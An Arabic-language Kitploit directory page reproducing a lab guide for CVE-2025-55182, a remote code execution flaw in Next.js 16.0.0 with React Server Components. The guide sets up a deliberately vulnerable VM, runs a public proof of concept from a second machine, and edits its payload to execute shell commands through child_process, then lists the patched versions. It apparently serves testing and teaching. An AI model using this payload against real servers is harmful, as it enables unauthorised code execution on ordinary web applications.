Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-55182-poc-test — مختبر قابل للتكرار يوضح CVE-2025-55182 لتنفيذ التعليمات البرمجية عن بُعد (Remote Code Execution) ضد Next.js 16.0.0 مع مكونات خادم React (React Server Components)، بما في ذلك تنفيذ الاستغلال الخارجي والتحقق من الآثار الجانبية. | Kitploit
أدوات/GitHubGitHub/jandelima/cve-2025-55182-poc-test
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

مختبر قابل للتكرار يوضح CVE-2025-55182 لتنفيذ التعليمات البرمجية عن بُعد (Remote Code Execution) ضد Next.js 16.0.0 مع مكونات خادم React (React Server Components)، بما في ذلك تنفيذ الاستغلال الخارجي والتحقق من الآثار الجانبية.

عرض المستودع
3منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر عرض CVE-2025-55182 (ثغرة تنفيذ الأكواد عن بُعد في Next.js / React RSC)

توفر هذه الوثيقة إعدادًا كاملاً وقابلاً للتكرار لعرض ثغرة CVE-2025-55182 لتنفيذ الأكواد عن بُعد (RCE) ضد بيئة Next.js + React Server Components ضعيفة تعمل داخل جهاز افتراضي Multipass Ubuntu.

يتم تنفيذ الاستغلال من خارج الجهاز الافتراضي، مما يثبت قابلية الاستغلال عن بُعد ويُعد البيئة للكشف عن السلوك الشاذ.

المصدر: https://github.com/ejpir/CVE-2025-55182-research


1. إنشاء جهاز Ubuntu الافتراضي وإعداده

2. الإعداد الأساسي داخل الجهاز الافتراضي

2.1 تحديث النظام وتثبيت التبعيات

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 تثبيت Node.js LTS (20.x)

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash - sudo apt install -y nodejs

تحقق:

root@kitploit:~
node -v
npm -v

2.3 إنشاء مستخدم مخصص للتطبيق

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. نشر تطبيق Next.js الضعيف

3.1 إنشاء دليل العمل

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 إنشاء مشروع Next.js App Router أساسي

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 تثبيت الإصدارات الضعيفة في package.json

قم بتحرير التبعيات:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

أعد تثبيت الحزم:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

تحقق:

root@kitploit:~
npm list react react-dom next

المتوقع:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 بناء وتشغيل في وضع الإنتاج

root@kitploit:~
npm run build
npm start

المخرجات المتوقعة:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

start


4. تأكيد الوصول الخارجي (جهاز المهاجم ← الجهاز الافتراضي)

على جهاز آخر:

root@kitploit:~
curl http://10.102.169.126:3000

يجب أن تتلقى صفحة Next.js الافتراضية بتنسيق HTML.


5. استنساخ واختبار الـ PoC على جهاز المهاجم

5.1 استنساخ المستودع

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 توجيه الـ PoC إلى عنوان IP للخادم

ابحث عن:

root@kitploit:~
hostname: 'localhost',

استبدل بـ:

root@kitploit:~
hostname: '10.X.X.X',

5.3 تشغيل الـ PoC الأساسي (طريقة console.log البسيطة RCE)

مع استمرار تشغيل Next:

root@kitploit:~
node test-simple.cjs

المتوقع في محطة Next.js:

root@kitploit:~
NON-CHUNKED-RCE

هذا يؤكد تنفيذ الأكواد عن بُعد عبر React Flight باستخدام الإصدارات الضعيفة.

confirmed


6. تعديل الـ PoC لتنفيذ تأثير جانبي مرئي (إنشاء ملف)

الهدف هو توليد سلوك قابل للملاحظة (نظام الملفات + تنفيذ عملية).

6.1 تحرير _prefix داخل test-simple.cjs

ابحث عن:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

استبدل بـ:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

ملاحظة: require غير متاحة في سياق التنفيذ، لكن process.mainModule.require() متاحة.

6.2 اختبار الاستغلال المُعدّل

تأكد من أن Next قيد التشغيل، ثم:

root@kitploit:~
node test-simple.cjs

تحقق من إنشاء الملف:

root@kitploit:~
ls -l /tmp/

يجب أن ترى:

root@kitploit:~
cve-2025-55182-syscall

هذا يؤكد تنفيذ الأكواد عن بُعد وظيفيًا مع تأثيرات جانبية.

start


التصحيح:
React ≥ 19.2.1
Next.js ≥ 16.0.7

تنزيل الأداة